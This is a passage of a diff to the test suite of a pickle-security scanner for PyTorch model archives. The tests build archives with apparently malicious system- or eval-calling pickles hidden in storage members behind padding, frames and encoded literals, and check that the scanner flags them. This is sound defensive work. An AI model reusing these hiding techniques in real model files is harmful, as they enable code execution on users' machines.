5bca797074771ecdfd6267d6e9be32ee201d937b. - return bytes.fromhex( - "4dae5b2ed9a78527072fd82ac529db2d822f181d76258832bd2f39a63527ad2e" - "ba2d3eacd9247fb0a32b1525682aa0253831dc2c4c3085296c2cbcb1f52bea31" - ) - - -def _binary_magic_tensor_storage_bytes() -> bytes: - return b"\x80\x04\x00" + (b"\x00" * 129) - - def _writestr_preserving_member_name(zip_file: zipfile.ZipFile, member_name: str, data: bytes) -> None: info = zipfile.ZipInfo("placeholder") info.filename = member_name @@ -1095,13 +711,6 @@ def _write_zip_with_duplicate_data_pkl(zip_path: Path, first_payload: bytes, sec zipf.writestr("data.pkl", second_payload) -def _require_torch_distribution() -> None: - try: - importlib_metadata.distribution("torch") - except importlib_metadata.PackageNotFoundError: - pytest.skip("torch distribution not installed") - - def _write_rebuild_tensor_v2_zip(zip_path: Path) -> None: with zipfile.ZipFile(zip_path, "w") as zipf: zipf.writestr("archive/version", "3\n") @@ -1639,24 +1248,8 @@ def test_pytorch_zip_warns_when_trusted_framework_reference_is_rebound_before_sc "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.TrainingArguments" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -1702,24 +1295,8 @@ def test_pytorch_zip_warns_when_framework_metadata_rebound_to_buildable_instance "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.OptimizerNames" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -1757,24 +1334,8 @@ def test_pytorch_zip_warns_when_unloaded_source_backed_metadata_import_is_not_in "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.OptimizerNames" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -1812,24 +1373,8 @@ def test_pytorch_zip_warns_when_source_backed_framework_reference_is_unloaded_be "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.TrainingArguments" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -1972,24 +1517,8 @@ def test_pytorch_zip_warns_when_late_loaded_framework_metadata_is_rebound_to_ins "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.TrainingArguments" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -2131,24 +1660,8 @@ def test_pytorch_zip_warns_when_rebound_framework_class_uses_descriptor_new_befo "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.TrainingArguments" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -2197,24 +1710,8 @@ def test_pytorch_zip_warns_when_rebound_framework_class_uses_data_descriptor_bef "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.TrainingArguments" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.TrainingArguments" ) @@ -2264,24 +1761,8 @@ def test_pytorch_zip_warns_when_rebound_framework_class_uses_metaclass_call_befo "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.OptimizerNames" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -2391,24 +1872,8 @@ def test_pytorch_zip_warns_when_framework_metadata_rebound_to_cross_module_sourc "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.OptimizerNames" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -2453,24 +1918,8 @@ def test_pytorch_zip_warns_when_framework_function_default_mutated_before_scanne "}))\n" ) - completed = subprocess.run( - [sys.executable, "-c", script, str(model_path), str(marker)], - check=False, - env=_preimport_rebound_subprocess_env(tmp_path, site_packages), - capture_output=True, - text=True, - ) - - assert completed.returncode == 0, completed.stderr - output = json.loads(completed.stdout) - assert output["marker_before_unpickle"] is False - assert output["marker_after_unpickle"] is True - assert output["pickle_verdict"] in {"suspicious", "malicious"} - assert not (output["success"] is True and output["pickle_verdict"] == "clean" and not output["issues"]) - assert any( - issue["rule_code"] == "NON_ALLOWLISTED_GLOBAL" - and issue["import_reference"] == "transformers.training_args.OptimizerNames" - for issue in output["issues"] + _assert_rebound_framework_subprocess( + tmp_path, model_path, marker, site_packages, script, "transformers.training_args.OptimizerNames" ) @@ -2700,37 +2149,15 @@ def test_pytorch_zip_discovery_scans_only_real_extensionless_pickle_near_text(tm def test_pytorch_zip_discovery_finds_hidden_extensionless_pickle_with_data_pkl(tmp_path: Path) -> None: """A normal data.pkl must not short-circuit hidden member pickle discovery.""" - model_path = tmp_path / "hidden_extensionless_pickle.pt" - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - zip_file.writestr("archive/payload", _malicious_proto0_system_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.metadata["pickle_files"] == ["archive/data.pkl", "archive/payload"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/payload" - for issue in result.issues + _assert_extensionless_pickle_selected( + tmp_path, ("hidden_extensionless_pickle.pt"), ("archive/payload"), ("archive/payload"), ("archive/payload") ) def test_pytorch_zip_discovery_finds_hidden_storage_pickle_with_data_pkl(tmp_path: Path) -> None: """Bounded storage-prefix sniffing should catch pickles hidden under data/.""" - model_path = tmp_path / "hidden_storage_pickle.pt" - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - zip_file.writestr("archive/data/0", _malicious_proto0_system_payload()) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.metadata["pickle_files"] == ["archive/data.pkl", "archive/data/0"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues + _assert_extensionless_pickle_selected( + tmp_path, ("hidden_storage_pickle.pt"), ("archive/data/0"), ("archive/data/0"), ("archive/data/0") ) @@ -2794,39 +2221,13 @@ def test_pytorch_zip_discovery_skips_referenced_yolov5n6_storage_prefix(tmp_path def test_pytorch_zip_discovery_scans_trailing_pickle_after_yolov5n6_scalar_prefix(tmp_path: Path) -> None: model_path = tmp_path / "referenced_yolov5n6_prefix_trailing_pickle.pt" storage_blob = _yolov5n6_tensor_storage_prefix_bytes()[:4] + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_binary_pickle_after_trivial_scalar_prefix(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_prefix_trailing_binary_pickle.pt" storage_blob = b"N." + _malicious_eval_pickle_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_binary_pickle_opcode_crossing_trusted_probe_boundary( @@ -2834,20 +2235,7 @@ def test_pytorch_zip_discovery_scans_binary_pickle_opcode_crossing_trusted_probe ) -> None: model_path = tmp_path / "referenced_scalar_prefix_binary_opcode_boundary.pt" storage_blob = b"N." + (b" " * 4093) + _malicious_eval_pickle_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_binary_pickle_after_mixed_padding_trivial_prefix( @@ -2878,20 +2266,7 @@ def test_pytorch_zip_discovery_scans_short_binunicode_crossing_trusted_probe_bou ) -> None: model_path = tmp_path / "referenced_scalar_prefix_short_binunicode_boundary.pt" storage_blob = b"N." + (b" " * 4093) + b"\x8c\x03abc" + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_binint_crossing_trusted_probe_boundary( @@ -2899,20 +2274,7 @@ def test_pytorch_zip_discovery_scans_binint_crossing_trusted_probe_boundary( ) -> None: model_path = tmp_path / "referenced_scalar_prefix_binint_boundary.pt" storage_blob = b"N." + (b" " * 4093) + b"J" + (1).to_bytes(4, "little") + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_binbytes_literal_after_trivial_stream( @@ -2921,20 +2283,7 @@ def test_pytorch_zip_discovery_scans_binbytes_literal_after_trivial_stream( model_path = tmp_path / "referenced_binbytes_literal_after_trivial_stream.pt" encoded_payload = base64.b64encode(_malicious_proto0_system_payload()) storage_blob = b"N." + _pickle_binbytes(encoded_payload) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_malformed_separator_run_in_expanded_probe( @@ -2943,20 +2292,7 @@ def test_pytorch_zip_discovery_scans_malformed_separator_run_in_expanded_probe( model_path = tmp_path / "referenced_malformed_separator_run_expanded.pt" encoded_payload = base64.b64encode(_malicious_proto0_system_payload()) storage_blob = b"N." + (b"!" * 5000) + _proto0_string_literal(encoded_payload) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_expands_frame_without_stop_at_trusted_probe_boundary( @@ -2968,20 +2304,7 @@ def test_pytorch_zip_discovery_expands_frame_without_stop_at_trusted_probe_bound pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(_pickle_frame(frame_payload)) ) storage_blob = b"N." + padding + _pickle_frame(frame_payload) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_literal_route_bounds_long_base64_without_size_only_signal( @@ -3008,20 +2331,7 @@ def test_pytorch_zip_discovery_scans_protocol0_int_crossing_trusted_probe_bounda ) -> None: model_path = tmp_path / "referenced_scalar_prefix_protocol0_int_boundary.pt" storage_blob = b"N." + (b" " * 4092) + b"I1\n." + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_extension_opcode_crossing_trusted_probe_boundary( @@ -3051,8 +2361,21 @@ def test_pytorch_zip_discovery_scans_extension_opcode_crossing_trusted_probe_bou def test_pytorch_zip_discovery_routes_encoded_extension_with_truncated_operand(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_truncated_extension_operand.pt" - storage_blob = b"S'ggFxAIwFeA=='\n." + _assert_truncated_encoded_extension( + tmp_path, ("referenced_truncated_extension_operand.pt"), (b"S'ggFxAIwFeA=='\n.") + ) + + +def test_pytorch_zip_discovery_routes_encoded_extension_with_live_mark_context(tmp_path: Path) -> None: + _assert_truncated_encoded_extension(tmp_path, ("referenced_live_mark_extension.pt"), (b"S'KE4wggEpb/8='\n.")) + + +def test_pytorch_zip_discovery_routes_encoded_extension_operand_cut_after_recovered_mark(tmp_path: Path) -> None: + model_path = tmp_path / "referenced_recovered_mark_extension_boundary.pt" + nested_payload = ( + b"(" + (b"N" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES - 2)) + b"\x82\x01)R." + ) + storage_blob = _proto0_string_literal(base64.b64encode(nested_payload)) storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(model_path, "w") as zip_file: zip_file.writestr("archive/version", "3\n") @@ -3066,45 +2389,10 @@ def test_pytorch_zip_discovery_routes_encoded_extension_with_truncated_operand(t assert "archive/data/0" in result.metadata["pickle_files"] -def test_pytorch_zip_discovery_routes_encoded_extension_with_live_mark_context(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_live_mark_extension.pt" - storage_blob = b"S'KE4wggEpb/8='\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is False - assert "archive/data/0" in result.metadata["pickle_files"] - - -def test_pytorch_zip_discovery_routes_encoded_extension_operand_cut_after_recovered_mark(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_recovered_mark_extension_boundary.pt" - nested_payload = ( - b"(" + (b"N" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES - 2)) + b"\x82\x01)R." - ) - storage_blob = _proto0_string_literal(base64.b64encode(nested_payload)) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is False - assert "archive/data/0" in result.metadata["pickle_files"] - - -def test_pytorch_zip_discovery_routes_nested_mark_extension_context(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_nested_mark_extension.pt" - payload = b"(N(N10\x82\x01)o\xff" - storage_blob = b"C" + bytes([len(payload)]) + payload + b"." +def test_pytorch_zip_discovery_routes_nested_mark_extension_context(tmp_path: Path) -> None: + model_path = tmp_path / "referenced_nested_mark_extension.pt" + payload = b"(N(N10\x82\x01)o\xff" + storage_blob = b"C" + bytes([len(payload)]) + payload + b"." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(model_path, "w") as zip_file: zip_file.writestr("archive/version", "3\n") @@ -3202,39 +2490,13 @@ def test_pytorch_zip_discovery_scans_repeated_trivial_prefix_crossing_trusted_pr ) -> None: model_path = tmp_path / "referenced_repeated_scalar_prefix_global_boundary.pt" storage_blob = b"N.N." + (b" " * (4096 - 4 - 5)) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_skips_padding_only_expanded_probe( tmp_path: Path, ) -> None: - model_path = tmp_path / "referenced_scalar_prefix_padding_only_expanded.pt" - storage_blob = b"N." + (b"\x00" * 70_002) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + _assert_storage_padding_clean(tmp_path, ("referenced_scalar_prefix_padding_only_expanded.pt"), (b"\x00"), (70_002)) def test_pytorch_zip_discovery_checks_long_window_before_padding_budget(tmp_path: Path) -> None: @@ -3757,20 +3019,7 @@ def test_pytorch_zip_discovery_scans_length_operand_crossing_trusted_probe_bound storage_blob = ( b"N." + (b" " * 4093) + b"X" + (3).to_bytes(4, "little") + b"abc" + _malicious_proto0_system_payload() ) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_marks_oversized_length_operand_incomplete( @@ -3802,20 +3051,7 @@ def test_pytorch_zip_discovery_scans_frame_header_crossing_trusted_probe_boundar frame_body = _malicious_proto0_system_payload() frame = b"\x95" + len(frame_body).to_bytes(8, "little") + frame_body storage_blob = b"N." + (b" " * 4086) + frame - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_frame_payload_crossing_trusted_probe_boundary( @@ -3825,20 +3061,7 @@ def test_pytorch_zip_discovery_scans_frame_payload_crossing_trusted_probe_bounda frame_body = _malicious_proto0_system_payload() frame = b"\x95" + len(frame_body).to_bytes(8, "little") + frame_body storage_blob = b"N." + (b" " * (4096 - 2 - 9)) + frame - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_second_frame_header_crossing_trusted_probe_boundary( @@ -3850,20 +3073,7 @@ def test_pytorch_zip_discovery_scans_second_frame_header_crossing_trusted_probe_ second_frame = _pickle_frame(second_frame_body) padding = b" " * (4096 - len(b"N.") - len(first_frame) - 1) storage_blob = b"N." + padding + first_frame + second_frame - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_frame_first_trivial_pickle_before_large_padding( @@ -3873,20 +3083,7 @@ def test_pytorch_zip_discovery_scans_frame_first_trivial_pickle_before_large_pad storage_blob = b"\x95" + (2).to_bytes(8, "little") + b"N." storage_blob += b" " * 5000 storage_blob += _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + 